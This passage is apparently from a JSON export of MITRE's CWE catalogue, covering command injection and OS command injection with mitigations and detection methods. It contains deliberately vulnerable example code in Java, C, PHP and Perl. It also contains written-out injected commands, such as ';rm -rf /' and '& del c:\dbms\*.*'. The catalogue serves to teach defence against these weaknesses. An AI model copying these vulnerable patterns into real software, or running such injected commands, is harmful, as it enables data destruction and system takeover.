\\"+btype+\\"&amp;&amp;c:\\\\\\\\utl\\\\\\\\cleanup.bat\\\\\\"\\")","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":"The problem here is that the program does not do any validation on the backuptype parameter read from the user. Typically the Runtime.exec() function will not execute multiple commands, but in this case the program first runs the cmd.exe shell in order to run multiple commands with a single call to Runtime.exec(). Once the shell is invoked, it will happily execute multiple commands separated by two ampersands. If an attacker passes a string of the form \\"&amp; del c:\\\\\\\\dbms\\\\\\\\*.*\\", then the application will execute this command along with the others specified by the program. Because of the nature of the application, it runs with the privileges necessary to interact with the database, which means whatever command the attacker injects will run with those privileges as well."},{"Intro_Text":"The following code from a system utility uses the system property APPHOME to determine the directory in which it is installed and then executes an initialization script based on a relative path from the specified directory.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...String home = System.getProperty(\\"APPHOME\\");String cmd = home + INITCMD;java.lang.Runtime.getRuntime().exec(cmd);...","xhtml:br":["","","",""]}},"Body_Text":"The code above allows an attacker to execute arbitrary commands with the elevated privilege of the application by modifying the system property APPHOME to point to a different path containing a malicious version of INITCMD. Because the program does not validate the value read from the environment, if an attacker can control the value of the system property APPHOME, then they can fool the application into running malicious code and take control of the system."},{"Intro_Text":"The following code is a wrapper around the UNIX command cat which prints the contents of a file to standard out. It is also injectable:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#include &lt;stdio.h&gt;#include &lt;unistd.h&gt;int main(int argc, char **argv) {}","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char cat[] = \\"cat \\";char *command;size_t commandLength;commandLength = strlen(cat) + strlen(argv[1]) + 1;command = (char *) malloc(commandLength);strncpy(command, cat, commandLength);strncat(command, argv[1], (commandLength - strlen(cat)) );system(command);return (0);","xhtml:br":["","","","","","","","","","",""]}}}},{"attr":{"@_Nature":"informative"},"xhtml:div":{"#text":"$ ./catWrapper Story.txtWhen last we left our heroes...","xhtml:br":""}},{"attr":{"@_Nature":"attack"},"xhtml:div":{"#text":"$ ./catWrapper Story.txt; lsWhen last we left our heroes...Story.txtSensitiveFile.txtPrivateData.dba.out*","xhtml:br":["","","","",""]}}],"Body_Text":["Used normally, the output is simply the contents of the file requested:","However, if we add a semicolon and another command to the end of this line, the command is executed by catWrapper with no complaint:","If catWrapper had been set to have a higher privilege level than the standard user, arbitrary commands could be executed with that higher privilege."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-0067","Description":"Canonical example of OS command injection. CGI program does not neutralize \\"|\\" metacharacter when invoking a phonebook program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0067"},{"Reference":"CVE-2019-12921","Description":"image program allows injection of commands in \\"Magick Vector Graphics (MVG)\\" language.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12921"},{"Reference":"CVE-2020-11698","Description":"anti-spam product allows injection of SNMP commands into confiuration file","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11698"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Command Injection"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Command injection"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A2","Entry_Name":"Injection Flaws","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A1","Entry_Name":"Unvalidated Input","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A6","Entry_Name":"Injection Flaws","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"IDS34-PL","Entry_Name":"Do not pass untrusted, unsanitized data to a command interpreter","Mapping_Fit":"CWE More Specific"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"136"}},{"attr":{"@_CAPEC_ID":"15"}},{"attr":{"@_CAPEC_ID":"183"}},{"attr":{"@_CAPEC_ID":"248"}},{"attr":{"@_CAPEC_ID":"40"}},{"attr":{"@_CAPEC_ID":"43"}},{"attr":{"@_CAPEC_ID":"75"}},{"attr":{"@_CAPEC_ID":"76"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-140"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 10: Command Injection.&#34; Page 171"}}]},"Notes":{"Note":{"attr":{"@_Type":"Terminology"},"xhtml:p":["The \\"command injection\\" phrase carries different meanings to different people. For some people, it refers to refers to any type of attack that can allow the attacker to execute commands of their own choosing, regardless of how those commands are inserted. The command injection could thus be resultant from another weakness. This usage also includes cases in which the functionality allows the user to specify an entire command, which is then executed; within CWE, this situation might be better regarded as an authorization problem (since an attacker should not be able to specify arbitrary commands.)","Another common usage, which includes CWE-77 and its descendants, involves cases in which the attacker injects separators into the command being constructed."]}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples, Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences, Description, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Other_Notes, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Description, Observed_Examples, Relationships"}],"Previous_Entry_Name":[{"#text":"Command Injection","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Data into a Control Plane (aka \'Command Injection\')","attr":{"@_Date":"2009-05-27"}},{"#text":"Failure to Sanitize Data into a Control Plane (\'Command Injection\')","attr":{"@_Date":"2009-07-27"}},{"#text":"Improper Sanitization of Special Elements used in a Command (\'Command Injection\')","attr":{"@_Date":"2010-06-21"}}]}},"78":{"attr":{"@_ID":"78","@_Name":"Improper Neutralization of Special Elements used in an OS Command (\'OS Command Injection\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"The software constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.","Extended_Description":{"xhtml:p":["This could allow attackers to execute unexpected, dangerous commands directly on the operating system. This weakness can lead to a vulnerability in environments in which the attacker does not have direct access to the operating system, such as in web applications. Alternately, if the weakness occurs in a privileged program, it could allow the attacker to specify commands that normally would not be accessible, or to call alternate commands with privileges that the attacker does not have. The problem is exacerbated if the compromised process does not follow the principle of least privilege, because the attacker-controlled commands may run with special system privileges that increases the amount of damage.","There are at least two subtypes of OS command injection:","From a weakness standpoint, these variants represent distinct programmer errors. In the first variant, the programmer clearly intends that input from untrusted parties will be part of the arguments in the command to be executed. In the second variant, the programmer does not intend for the command to be accessible to any untrusted party, but the programmer probably has not accounted for alternate ways in which malicious attackers can provide input."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ol":{"xhtml:li":["The application intends to execute a single, fixed program that is under its own control. It intends to use externally-supplied inputs as arguments to that program. For example, the program might use system(\\"nslookup [HOSTNAME]\\") to run nslookup and allow the user to supply a HOSTNAME, which is used as an argument. Attackers cannot prevent nslookup from executing. However, if the program does not remove command separators from the HOSTNAME argument, attackers could place the separators into the arguments, which allows them to execute their own program after nslookup has finished executing.","The application accepts an input that it uses to fully select which program to run, as well as which commands to use. The application simply redirects this entire command to the operating system. For example, the program might use \\"exec([COMMAND])\\" to execute the [COMMAND] that was supplied by the user. If the COMMAND is under attacker control, then the attacker can execute arbitrary commands or programs. If the command is being executed using functions like exec() and CreateProcess(), the attacker might not be able to combine multiple commands together in the same line."]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"77","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"74","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"77","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"77","@_View_ID":"1340","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"88","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"Shell injection"},{"Term":"Shell metacharacters"}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Non-Repudiation"],"Impact":["Execute Unauthorized Code or Commands","DoS: Crash, Exit, or Restart","Read Files or Directories","Modify Files or Directories","Read Application Data","Modify Application Data","Hide Activities"],"Note":"Attackers could execute unauthorized commands, which could then be used to disable the software, or read and modify data for which the attacker does not have permissions to access directly. Since the targeted application is directly executing the commands instead of the attacker, any malicious activities may appear to come from the application or the application\'s owner."}},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-1"},"Method":"Automated Static Analysis","Description":{"xhtml:p":["This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives.","Automated static analysis might not be able to recognize when proper input validation is being performed, leading to false positives - i.e., warnings that do not have any security consequences or require any code changes.","Automated static analysis might not be able to detect the usage of custom API functions or third-party libraries that indirectly invoke OS commands, leading to false negatives - especially if the API/library code is not available for analysis."]},"Effectiveness_Notes":"This is not a perfect solution, since 100% accuracy and coverage are not feasible."},{"attr":{"@_Detection_Method_ID":"DM-2"},"Method":"Automated Dynamic Analysis","Description":"This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results.","Effectiveness":"Moderate"},{"attr":{"@_Detection_Method_ID":"DM-10"},"Method":"Manual Static Analysis","Description":"Since this weakness does not typically appear frequently within a single software package, manual white box techniques may be able to provide sufficient code coverage and reduction of false positives if all potentially-vulnerable operations can be assessed within limited time constraints.","Effectiveness":"High"},{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Binary Weakness Analysis - including disassembler + source code weakness analysis"]}}]}},"Effectiveness":"High"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Focused Manual Spotcheck - Focused manual analysis of source"}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"If at all possible, use library calls rather than external processes to recreate the desired functionality."},{"attr":{"@_Mitigation_ID":"MIT-22"},"Phase":["Architecture and Design","Operation"],"Strategy":"Sandbox or Jail","Description":{"xhtml:p":["Run the code in a \\"jail\\" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software.","OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations.","This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise.","Be careful to avoid CWE-243 and other weaknesses related to jails."]},"Effectiveness":"Limited","Effectiveness_Notes":"The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed."},{"Phase":"Architecture and Design","Strategy":"Attack Surface Reduction","Description":"For any data that will be used to generate a command to be executed, keep as much of that data out of external control as possible. For example, in web applications, this may require storing the data locally in the session\'s state instead of sending it out to the client in a hidden form field."},{"attr":{"@_Mitigation_ID":"MIT-15"},"Phase":"Architecture and Design","Description":"For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server."},{"attr":{"@_Mitigation_ID":"MIT-4.3"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, consider using the ESAPI Encoding control [REF-45] or a similar tool, library, or framework. These will help the programmer encode outputs in a manner less prone to error."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"Phase":"Implementation","Description":"If the program to be executed allows arguments to be specified within an input file or from standard input, then consider using that mode to pass arguments instead of the command line."},{"attr":{"@_Mitigation_ID":"MIT-27"},"Phase":"Architecture and Design","Strategy":"Parameterization","Description":{"xhtml:p":["If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.","Some languages offer multiple functions that can be used to invoke commands. Where possible, identify any function that invokes a command shell using a single string, and replace it with a function that requires individual arguments. These functions typically perform appropriate quoting and filtering of arguments. For example, in C, the system() function accepts a string that contains the entire command to be executed, whereas execl(), execve(), and others require an array of strings, one for each argument. In Windows, CreateProcess() only accepts one command at a time. In Perl, if system() is provided with an array of arguments, then it will quote each of the arguments."]}},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When constructing OS command strings, use stringent allowlists that limit the character set based on the expected value of the parameter in the request. This will indirectly limit the scope of an attack, but this technique is less important than proper output encoding and escaping.","Note that proper output encoding, escaping, and quoting is the most effective solution for preventing OS command injection, although input validation may provide some defense-in-depth. This is because it effectively limits what will appear in output. Input validation will not always prevent OS command injection, especially if you are required to support free-form text fields that could contain arbitrary characters. For example, when invoking a mail program, you might need to allow the subject field to contain otherwise-dangerous inputs like \\";\\" and \\"&gt;\\" characters, which would need to be escaped or otherwise handled. In this case, stripping the character might reduce the risk of OS command injection, but it would produce incorrect behavior because the subject field would not be recorded as the user intended. This might seem to be a minor inconvenience, but it could be more important when the program relies on well-structured subject lines in order to pass messages to other components.","Even if you make a mistake in your validation (such as forgetting one out of 100 input fields), appropriate encoding is still likely to protect you from injection-based attacks. As long as it is not done in isolation, input validation is still a useful technique, since it may significantly reduce your attack surface, allow you to detect some attacks, and provide other security benefits that proper encoding does not address."]}},{"attr":{"@_Mitigation_ID":"MIT-21"},"Phase":"Architecture and Design","Strategy":"Enforcement by Conversion","Description":"When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs."},{"attr":{"@_Mitigation_ID":"MIT-32"},"Phase":"Operation","Strategy":"Compilation or Build Hardening","Description":"Run the code in an environment that performs automatic taint propagation and prevents any command execution that uses tainted variables, such as Perl\'s \\"-T\\" switch. This will force the program to perform validation steps that remove the taint, although you must be careful to correctly validate your inputs so that you do not accidentally mark dangerous inputs as untainted (see CWE-183 and CWE-184)."},{"attr":{"@_Mitigation_ID":"MIT-32"},"Phase":"Operation","Strategy":"Environment Hardening","Description":"Run the code in an environment that performs automatic taint propagation and prevents any command execution that uses tainted variables, such as Perl\'s \\"-T\\" switch. This will force the program to perform validation steps that remove the taint, although you must be careful to correctly validate your inputs so that you do not accidentally mark dangerous inputs as untainted (see CWE-183 and CWE-184)."},{"attr":{"@_Mitigation_ID":"MIT-39"},"Phase":"Implementation","Description":{"xhtml:p":["Ensure that error messages only contain minimal details that are useful to the intended audience and no one else. The messages need to strike the balance between being too cryptic (which can confuse users) or being too detailed (which may reveal more than intended). The messages should not reveal the methods that were used to determine the error. Attackers can use detailed information to refine or optimize their original attack, thereby increasing their chances of success.","If errors must be captured in some detail, record them in log messages, but consider what could occur if the log messages can be viewed by attackers. Highly sensitive information such as passwords should never be saved to log files.","Avoid inconsistent messaging that might accidentally tip off an attacker about internal state, such as whether a user account exists or not.","In the context of OS Command Injection, error information passed back to the user might reveal whether an OS command is being executed and possibly which command is being used."]}},{"Phase":"Operation","Strategy":"Sandbox or Jail","Description":"Use runtime policy enforcement to create an allowlist of allowable commands, then prevent use of any command that does not appear in the allowlist. Technologies such as AppArmor are available to do this."},{"attr":{"@_Mitigation_ID":"MIT-29"},"Phase":"Operation","Strategy":"Firewall","Description":"Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth.","Effectiveness":"Moderate","Effectiveness_Notes":"An application firewall might not cover all possible input vectors. In addition, attack techniques might be available to bypass the protection mechanism, such as using malformed inputs that can still be processed by the component that receives those inputs. Depending on functionality, an application firewall might inadvertently reject or modify legitimate requests. Finally, some manual effort may be required for customization."},{"attr":{"@_Mitigation_ID":"MIT-17"},"Phase":["Architecture and Design","Operation"],"Strategy":"Environment Hardening","Description":"Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations."},{"attr":{"@_Mitigation_ID":"MIT-16"},"Phase":["Operation","Implementation"],"Strategy":"Environment Hardening","Description":"When using PHP, configure the application so that it does not use register_globals. During implementation, develop the application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"This example code intends to take the name of a user and list the contents of that user\'s home directory. It is subject to the first variant of OS command injection.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$userName = $_POST[\\"user\\"];$command = \'ls -l /home/\' . $userName;system($command);","xhtml:br":["",""]}},{"attr":{"@_Nature":"attack"},"xhtml:div":";rm -rf /"},{"attr":{"@_Nature":"result"},"xhtml:div":"ls -l /home/;rm -rf /"}],"Body_Text":["The $userName variable is not checked for malicious input. An attacker could set the $userName variable to an arbitrary OS command such as:","Which would result in $command being:","Since the semi-colon is a command separator in Unix, the OS would first execute the ls command, then the rm command, deleting the entire file system.","Also note that this example code is vulnerable to Path Traversal (CWE-22) and Untrusted Search Path (CWE-426) attacks."]},{"Intro_Text":"This example is a web application that intends to perform a DNS lookup of a user-supplied domain name. It is subject to the first variant of OS command injection.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"use CGI qw(:standard);$name = param(\'name\');$nslookup = \\"/path/to/nslookup\\";print header;if (open($fh, \\"$nslookup $name|\\")) {}","xhtml:br":["","","",""],"xhtml:div":{"#text":"while (&lt;$fh&gt;) {}close($fh);","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"print escapeHTML($_);print \\"&lt;br&gt;\\\\n\\";","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:br":""}}},{"attr":{"@_Nature":"attack"},"xhtml:div":"cwe.mitre.org%20%3B%20/bin/ls%20-l"},{"attr":{"@_Nature":"result"},"xhtml:div":"/path/to/nslookup cwe.mitre.org ; /bin/ls -l"}],"Body_Text":["Suppose an attacker provides a domain name like this:","The \\"%3B\\" sequence decodes to the \\";\\" character, and the %20 decodes to a space. The open() statement would then process a string like this:","As a result, the attacker executes the \\"/bin/ls -l\\" command and gets a list of all the files in the program\'s working directory. The input could be replaced with much more dangerous commands, such as installing a malicious program on the server."]},{"Intro_Text":"The example below reads the name of a shell script to execute from the system properties. It is subject to the second variant of OS command injection.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String script = System.getProperty(\\"SCRIPTNAME\\");if (script != null)","xhtml:br":"","xhtml:div":{"#text":"System.exec(script);","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":"If an attacker has control over this property, then they could modify the property to point to a dangerous program."},{"Intro_Text":"In the example below, a method is used to transform geographic coordinates from latitude and longitude format to UTM format. The method gets the input coordinates from a user through a HTTP request and executes a program local to the application server that performs the transformation. The method passes the latitude and longitude coordinates as a command-line option to the external program and will perform some processing to retrieve the results of the transformation and return the resulting UTM coordinates.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public String coordinateTransformLatLonToUTM(String coordinates){}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"String utmCoords = null;try {}catch(Exception e) {...}return utmCoords;","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"String latlonCoords = coordinates;Runtime rt = Runtime.getRuntime();Process exec = rt.exec(\\"cmd.exe /C latlon2utm.exe -\\" + latlonCoords);","xhtml:br":["","","","","",""],"xhtml:i":["// process results of coordinate transform","// ..."]}}}}}},"Body_Text":"However, the method does not verify that the contents of the coordinates input parameter includes only correctly-formatted latitude and longitude coordinates. If the input coordinates were not validated prior to the call to this method, a malicious user could execute another program local to the application server by appending \'&amp;\' followed by the command for another program to the end of the coordinate string. The \'&amp;\' instructs the Windows operating system to execute another program."},{"attr":{"@_Demonstrative_Example_ID":"DX-28"},"Intro_Text":"The following code is from an administrative web application designed to allow users to kick off a backup of an Oracle database using a batch-file wrapper around the rman utility and then run a cleanup.bat script to delete some temporary files. The script rmanDB.bat accepts a single command line parameter, which specifies what type of backup to perform. Because access to the database is restricted, the application runs the backup as a privileged user.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...String btype = request.getParameter(\\"backuptype\\");String cmd = new String(\\"cmd.exe /K \\\\\\"System.Runtime.getRuntime().exec(cmd);...","xhtml:br":["","","",""],"xhtml:div":{"#text":"c:\\\\\\\\util\\\\\\\\rmanDB.bat 